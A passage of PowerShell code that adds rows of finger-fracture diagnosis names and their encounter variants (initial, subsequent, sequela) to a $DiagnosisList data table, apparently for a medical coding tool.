fracture of distal phalanx of left ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left ring finger","Displaced fracture of distal phalanx of left ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left ring finger","Displaced fracture of distal phalanx of left ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left ring finger","Displaced fracture of distal phalanx of left ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left ring finger","Displaced fracture of distal phalanx of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right little finger","Displaced fracture of distal phalanx of right little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right little finger","Displaced fracture of distal phalanx of right little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right little finger","Displaced fracture of distal phalanx of right little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right little finger","Displaced fracture of distal phalanx of right little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right little finger","Displaced fracture of distal phalanx of right little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right little finger","Displaced fracture of distal phalanx of right little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right little finger","Displaced fracture of distal phalanx of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left little finger","Displaced fracture of distal phalanx of left little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left little finger","Displaced fracture of distal phalanx of left little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left little finger","Displaced fracture of distal phalanx of left little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left little finger","Displaced fracture of distal phalanx of left little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left little finger","Displaced fracture of distal phalanx of left little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left little finger","Displaced fracture of distal phalanx of left little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left little finger","Displaced fracture of distal phalanx of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of other finger","Displaced fracture of distal phalanx of other finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of other finger","Displaced fracture of distal phalanx of other finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of other finger","Displaced fracture of distal phalanx of other finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of other finger","Displaced fracture of distal phalanx of other finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of other finger","Displaced fracture of distal phalanx of other finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of other finger","Displaced fracture of distal phalanx of other finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of other finger","Displaced fracture of distal phalanx of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified finger","Displaced fracture of distal phalanx of unspecified finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified finger","Displaced fracture of distal phalanx of unspecified finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified finger","Displaced fracture of distal phalanx of unspecified finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified finger","Displaced fracture of distal phalanx of unspecified finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified finger","Displaced fracture of distal phalanx of unspecified finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified finger","Displaced fracture of distal phalanx of unspecified finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified finger","Displaced fracture of distal phalanx of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right index finger","Nondisplaced fracture of proximal phalanx of right index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right index finger","Nondisplaced fracture of proximal phalanx of right index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right index finger","Nondisplaced fracture of proximal phalanx of right index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right index finger","Nondisplaced fracture of proximal phalanx of right index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right index finger","Nondisplaced fracture of proximal phalanx of right index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right index finger","Nondisplaced fracture of proximal phalanx of right index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right index finger","Nondisplaced fracture of proximal phalanx of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left index finger","Nondisplaced fracture of proximal phalanx of left index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left index finger","Nondisplaced fracture of proximal phalanx of left index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left index finger","Nondisplaced fracture of proximal phalanx of left index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left index finger","Nondisplaced fracture of proximal phalanx of left index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left index finger","Nondisplaced fracture of proximal phalanx of left index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left index finger","Nondisplaced fracture of proximal phalanx of left index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left index finger","Nondisplaced fracture of proximal phalanx of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right middle finger","Nondisplaced fracture of proximal phalanx of right middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right middle finger","Nondisplaced fracture of proximal phalanx of right middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right middle finger","Nondisplaced fracture of proximal phalanx of right middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right middle finger","Nondisplaced fracture of proximal phalanx of right middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right middle finger","Nondisplaced fracture of proximal phalanx of right middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right middle finger","Nondisplaced fracture of proximal phalanx of right middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right middle finger","Nondisplaced fracture of proximal phalanx of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left middle finger","Nondisplaced fracture of proximal phalanx of left middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left middle finger","Nondisplaced fracture of proximal phalanx of left middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left middle finger","Nondisplaced fracture of proximal phalanx of left middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left middle finger","Nondisplaced fracture of proximal phalanx of left middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left middle finger","Nondisplaced fracture of proximal phalanx of left middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left middle finger","Nondisplaced fracture of proximal phalanx of left middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left middle finger","Nondisplaced fracture of proximal phalanx of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right ring finger","Nondisplaced fracture of proximal phalanx of right ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right ring finger","Nondisplaced fracture of proximal phalanx of right ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right ring finger","Nondisplaced fracture of proximal phalanx of right ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right ring finger","Nondisplaced fracture of proximal phalanx of right ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right ring finger","Nondisplaced fracture of proximal phalanx of right ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right ring finger","Nondisplaced fracture of proximal phalanx of right ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right ring finger","Nondisplaced fracture of proximal phalanx of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left ring finger","Nondisplaced fracture of proximal phalanx of left ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left ring finger","Nondisplaced fracture of proximal phalanx of left ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left ring finger","Nondisplaced fracture of proximal phalanx of left ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left ring finger","Nondisplaced fracture of proximal phalanx of left ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left ring finger","Nondisplaced fracture of proximal phalanx of left ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left ring finger","Nondisplaced fracture of proximal phalanx of left ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left ring finger","Nondisplaced fracture of proximal phalanx of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right little finger","Nondisplaced fracture of proximal phalanx of right little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right little finger","Nondisplaced fracture of proximal phalanx of right little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right little finger","Nondisplaced fracture of proximal phalanx of right little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right little finger","Nondisplaced fracture of proximal phalanx of right little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right little finger","Nondisplaced fracture of proximal phalanx of right little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right little finger","Nondisplaced fracture of proximal phalanx of right little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right little finger","Nondisplaced fracture of proximal phalanx of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left little finger","Nondisplaced fracture of proximal phalanx of left little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left little finger","Nondisplaced fracture of proximal phalanx of left little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left little finger","Nondisplaced fracture of proximal phalanx of left little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left little finger","Nondisplaced fracture of proximal phalanx of left little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left little finger","Nondisplaced fracture of proximal phalanx of left little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left little finger","Nondisplaced fracture of proximal phalanx of left little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left little finger","Nondisplaced fracture of proximal phalanx of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of other finger","Nondisplaced fracture of proximal phalanx of other finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of other finger","Nondisplaced fracture of proximal phalanx of other finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of other finger","Nondisplaced fracture of proximal phalanx of other finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of other finger","Nondisplaced fracture of proximal phalanx of other finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of other finger","Nondisplaced fracture of proximal phalanx of other finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of other finger","Nondisplaced fracture of proximal phalanx of other finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of other finger","Nondisplaced fracture of proximal phalanx of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified finger","Nondisplaced fracture of proximal phalanx of unspecified finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified finger","Nondisplaced fracture of proximal phalanx of unspecified finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified finger","Nondisplaced fracture of proximal phalanx of unspecified finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified finger","Nondisplaced fracture of proximal phalanx of unspecified finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified finger","Nondisplaced fracture of proximal phalanx of unspecified finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified finger","Nondisplaced fracture of proximal phalanx of unspecified finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified finger","Nondisplaced fracture of proximal phalanx of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right index finger","Nondisplaced fracture of middle phalanx of right index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right index finger","Nondisplaced fracture of middle phalanx of right index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right index finger","Nondisplaced fracture of middle phalanx of right index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right index finger","Nondisplaced fracture of middle phalanx of right index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right index finger","Nondisplaced fracture of middle phalanx of right index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right index finger","Nondisplaced fracture of middle phalanx of right index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right index finger","Nondisplaced fracture of middle phalanx of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left index finger","Nondisplaced fracture of middle phalanx of left index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left index finger","Nondisplaced fracture of middle phalanx of left index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left index finger","Nondisplaced fracture of middle phalanx of left index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left index finger","Nondisplaced fracture of middle phalanx of left index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left index finger","Nondisplaced fracture of middle phalanx of left index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left index finger","Nondisplaced fracture of middle phalanx of left index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left index finger","Nondisplaced fracture of middle phalanx of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right middle finger","Nondisplaced fracture of middle phalanx of right middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right middle finger","Nondisplaced fracture of middle phalanx of right middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right middle finger","Nondisplaced fracture of middle phalanx of right middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right middle finger","Nondisplaced fracture of middle phalanx of right middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right middle finger","Nondisplaced fracture of middle phalanx of right middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right middle finger","Nondisplaced fracture of middle phalanx of right middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right middle finger","Nondisplaced fracture of middle phalanx of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left middle finger","Nondisplaced fracture of middle phalanx of left middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left middle finger","Nondisplaced fracture of middle phalanx of left middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left middle finger","Nondisplaced fracture of middle phalanx of left middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left middle finger","Nondisplaced fracture of middle phalanx of left middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left middle finger","Nondisplaced fracture of middle phalanx of left middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left middle finger","Nondisplaced fracture of middle phalanx of left middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left middle finger","Nondisplaced fracture of middle phalanx of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right ring finger","Nondisplaced fracture of medial phalanx of right ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right ring finger","Nondisplaced fracture of medial phalanx of right ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right ring finger","Nondisplaced fracture of medial phalanx of right ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right ring finger","Nondisplaced fracture of medial phalanx of right ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right ring finger","Nondisplaced fracture of medial phalanx of right ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right ring finger","Nondisplaced fracture of medial phalanx of right ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right ring finger","Nondisplaced fracture of medial phalanx of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left ring finger","Nondisplaced fracture of medial phalanx of left ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left ring finger","Nondisplaced fracture of medial phalanx of left ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left ring finger","Nondisplaced fracture of medial phalanx of left ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left ring finger","Nondisplaced fracture of medial phalanx of left ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left ring finger","Nondisplaced fracture of medial phalanx of left ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left ring finger","Nondisplaced fracture of medial phalanx of left ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left ring finger","Nondisplaced fracture of medial phalanx of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right little finger","Nondisplaced fracture of medial phalanx of right little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right little finger","Nondisplaced fracture of medial phalanx of right little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right little finger","Nondisplaced fracture of medial phalanx of right little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right little finger","Nondisplaced fracture of medial phalanx of right little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right little finger","Nondisplaced fracture of medial phalanx of right little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right little finger","Nondisplaced fracture of medial phalanx of right little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of right little finger","Nondisplaced fracture of medial phalanx of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left little finger","Nondisplaced fracture of medial phalanx of left little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left little finger","Nondisplaced fracture of medial phalanx of left little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left little finger","Nondisplaced fracture of medial phalanx of left little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left little finger","Nondisplaced fracture of medial phalanx of left little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left little finger","Nondisplaced fracture of medial phalanx of left little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left little finger","Nondisplaced fracture of medial phalanx of left little finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of left little finger","Nondisplaced fracture of medial phalanx of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of other finger","Nondisplaced fracture of medial phalanx of other finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of other finger","Nondisplaced fracture of medial phalanx of other finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of other finger","Nondisplaced fracture of medial phalanx of other finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of other finger","Nondisplaced fracture of medial phalanx of other finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of other finger","Nondisplaced fracture of medial phalanx of other finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of other finger","Nondisplaced fracture of medial phalanx of other finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of other finger","Nondisplaced fracture of medial phalanx of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of unspecified finger","Nondisplaced fracture of medial phalanx of unspecified finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of unspecified finger","Nondisplaced fracture of medial phalanx of unspecified finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of unspecified finger","Nondisplaced fracture of medial phalanx of unspecified finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of unspecified finger","Nondisplaced fracture of medial phalanx of unspecified finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of unspecified finger","Nondisplaced fracture of medial phalanx of unspecified finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of unspecified finger","Nondisplaced fracture of medial phalanx of unspecified finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial phalanx of unspecified finger","Nondisplaced fracture of medial phalanx of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right index finger","Nondisplaced fracture of distal phalanx of right index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right index finger","Nondisplaced fracture of distal phalanx of right index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right index finger","Nondisplaced fracture of distal phalanx of right index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right index finger","Nondisplaced fracture of distal phalanx of right index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right index finger","Nondisplaced fracture of distal phalanx of right index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right index finger","Nondisplaced fracture of distal phalanx of right index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right index finger","Nondisplaced fracture of distal phalanx of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left index finger","Nondisplaced fracture of distal phalanx of left index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left index finger","Nondisplaced fracture of distal phalanx of left index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left index finger","Nondisplaced fracture of distal phalanx of left index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left index finger","Nondisplaced fracture of distal phalanx of left index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left index finger","Nondisplaced fracture of distal phalanx of left index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left index finger","Nondisplaced fracture of distal phalanx of left index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left index finger","Nondisplaced fracture of distal phalanx of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right middle finger","Nondisplaced fracture 